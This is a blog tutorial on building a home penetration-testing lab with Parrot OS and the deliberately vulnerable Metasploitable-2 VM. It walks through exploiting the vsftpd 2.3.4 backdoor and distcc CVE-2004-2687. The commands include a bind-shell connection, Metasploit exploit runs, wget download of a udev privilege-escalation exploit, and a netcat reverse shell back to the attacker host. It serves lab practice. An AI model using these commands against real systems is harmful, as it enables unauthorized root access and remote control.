Basic Penetration testing lab — 1

Sahil Ahamad
Sep 16, 2018 · 8 min read

I am setting up a new lab for me and thought to document the process, so anyone who wants to do the same can take references from this post. I am writing this one from scratch and I will also add more parts as I move forward.

Preface

  1. Downloading all the things.
  2. Creating Virtual machines
  3. Configuring Virtual machines
  4. Reconnaissance
  5. Exploiting Common vulnerabilities — Metasploitable-2
  6. Credits

1. Downloading all the Things.

Vmware Fusion 10 — I like the paid version of the Vmware fusion 10 but you guys also use the Virtual box, which is FREE but I highly recommend Vmware fusion 10.

Parrot OS — I am using Kali Linux for a long time, I wanted to try parrot OS because it was recommended by many.

https://metasploit.help.rapid7.com/docs/metasploitable-2

Metasploitable-2 — Metasploitable-2 is vulnerable by birth, it is developed by the rapid7 for practicing on the vulnerable host. DO NOT expose this machine on any prod or sensitive server.

2. Creating Virtual Machines.

Parrot OS

Click on the “Install from disc or image” and locate your ISO and Provide default configs, you can choose the memory and size according to your need.

Image for post
Image for post

Provide the location of the Parrot OS.

Image for post
Image for post
Image for post
Image for post

You can use “live mode” or install. I preferred the Installed version.

Image for post
Image for post

Metasploitable-2

The installation process is similar to the ParrotOS.

Image for post
Image for post

You can provide the memory and size according to your need but keep in mind. You should keep the host machine in mind during providing custom memory and size.

Image for post
Image for post

3. Configuring Virtual Machines

For setting up a penetration testing lab it is important to make the connection between the machines locally. For doing that you have to use the “Bridge Connection” in the network settings.

ParrotOS

Image for post
Image for post
You can use according to your requirements.
Image for post
Image for post

Metasploitable-2

Image for post
Image for post
Image for post
Image for post

4. Reconnaissance

Startup both machines ParrotOS & Metasploitable-2.

Metasploitable-2

Login with the following credentials.

Username: msfadmin
Password: msfadmin

Local IP address for Metasploitable-2 using

ifconfig
Image for post
Image for post

Metasploitable-2 local IP: 192.168.10.10

ParrotOS

Login with your credentials.

default credentials for parrotOS

Username: userPassword : toor

Find the IP address for ParrotOS using the following command.

ifconfig
Image for post
Image for post
ParrotOS : local IP 192.168.10.5

Port scanning Metasploitable-2 using ParrotOS

nmap -A 192.168.10.10 -oX /home/ehsahil/Desktop/metaspliot2-nmap-scan.xml
Image for post
Image for post

the output is in XML format, let's convert it in the more organized way.

for doing this we will use a utility known as “xsltproc” — which will convert the XML into the html.

xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.xml
Image for post
Image for post
Image for post
Image for post

5. Exploiting Common Vulnerabilities.

Metasploitable — 2

1. Exploiting vsftpd 2.3.4

2. Exploiting Distcc V1 — CVE-2004–2687

1. Exploiting vsftpd 2.3.4.

Aim: Exploit VSFTPD daemon and obtain root access.

Scanning port 21 using nmap.

nmap -sV -p 21 192.168.10.10
Image for post
Image for post

port 21 is open and using vsftpd version 2.3.4.

Searching online for the publicly available exploit for this particular version.

vsftp 2.3.4 exploits

Exploiting manually.

ftp 192.168.10.10username: — ehsahil:)
Password — Nothing just enter

PS: smiley emoji :) is important at the end, :) it will be used to trigger the backdoor.

Image for post
Image for post

now, we need to listen to port 6200 because backdoor opened the port 6200

nc -vvn 192.168.10.10 6200
Image for post
Image for post

Exploiting Using Metasploitable-2.

Start Metasploitable-2 by using the msfconsole command.

msfconsole
Image for post
Image for post

Metasploit Commands.

search vsftpduse exploit/Unix/ftp/vsftpd_234_backdoorshow optionsset RHOST 192.168.10.10exploit
Image for post
Image for post
Image for post
Image for post

Background: This specific version of the vsftpd was infected with a backdoor by an intruder, the developers quickly responded by deleting the backdoor from the code. the users who upgraded to this version were vulnerable to the issue.

the backdoor is initiated when someone adds :) (smiley face) in the username during ftp handshake. then backdoor sets up a bind shell listener on port 6200.

Vulnerable Source code: http://pastebin.com/AetT9sS5

Detailed Source code review:

2. Exploiting Vulnerable DISTCC — CVE-2004–2687

Aim: Getting root access on the machine.

DISTCC V1 is known vulnerable application running on Metasploitable-2 but it is interesting because we have to escalate normal user to root using “Privilege Escalation”

Searching about distcc on online

distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

distcc running on port 3632

Running nmap against port — 3632

nmap -sV -p 3632 192.168.10.10
Image for post
Image for post

Searching for the public exploit for distccd v1

Vulnerable to: CVE-2004–2687

Exploit publicly available. https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

Exploiting using Metasploit

msfconsole
Image for post
Image for post
Image for post
Image for post

metasploit commands.

search distccuse exploit/unix/distcc_execshow optionsset RHOST 192.168.10.10exploit
Image for post
Image for post

Currently, uid=1 and we cannot cat /etc/shadow , This indicated that we don't have root privileges yet.

We need to leverage another vulnerability available in the installed components

for doing that we need to apply recon process to know more about the system.

Seeing all the shells available to us.

cat /etc/shells
Image for post
Image for post

GCC — Used for compiling exploits

which gcc
Image for post
Image for post

WGET — Used to download the exploit in the vulnerable machine

which wget
Image for post
Image for post

lets, see all the running processes.

ps aux
Image for post
Image for post

from the above processes, we can move forward to see publicly available exploits.

but, as we are using Metasploitable-2, we already know the vulnerable component, we will use that.

The vulnerable component is “udev”, let's grep for it from the running processes.

Image for post
Image for post

Searching for exploits on searchsploit

searchsploit udev
Image for post
Image for post

We are interested in the exploit for “local privilege Escalation(2) — /exploits/linux/local/8572.c”

cat /usr/share/exploitdb/exploits/linux/local/8572.c

Exploit usage.

Image for post
Image for post

Steps for escalating daemon to root.

  1. Starting local Apache server — apache2
service apache2 start
Image for post
Image for post

2. Coping the exploit into the apache server public directory

Exploit directory — /usr/share/exploitdb/exploits/linux/local/

Apache servers public directory: /var/www/html

sudo /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c
Image for post
Image for post

3. Copying the exploit file into the vulnerable machine using wget.

ParrotOS IP: 192.168.10.5wget 192.168.10.5/ehsahil.c
Image for post
Image for post

our exploit code “ehsahil.c” has been copied to /tmp directory.

4. Creating a run file in /tmp directory — required by exploit


touch run #creating run file required by the exploit
#bash script to get the reverse shell.
echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/bash 192.168.10.5 5555' >> run
Image for post
Image for post

5. Compiling our exploit code.

gcc ehsahil.c -o ehsahil
Image for post
Image for post

6. listening on post 5555

nc -lvnp 5555
Image for post
Image for post

7. PID of the udev Netlink socket

cat /proc/net/netlink
Image for post
Image for post

PID of the udev Netlink socket = 2718

8. Executable permission to Compiled Exploit.

chmod 755 ehsahil

9. Exploit.

./ehsahil <Netlink-Socket-address>

./ehsahil 2718

Reverse shell obtained.

Image for post
Image for post

I will post more metasploitable2 common exploits as I practice them.

Credits

RWB NetSec

Feedback? hit me on twitter @ehsahil

Until Next time.

Inbughunters

The community of Indian Bug Hunters

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store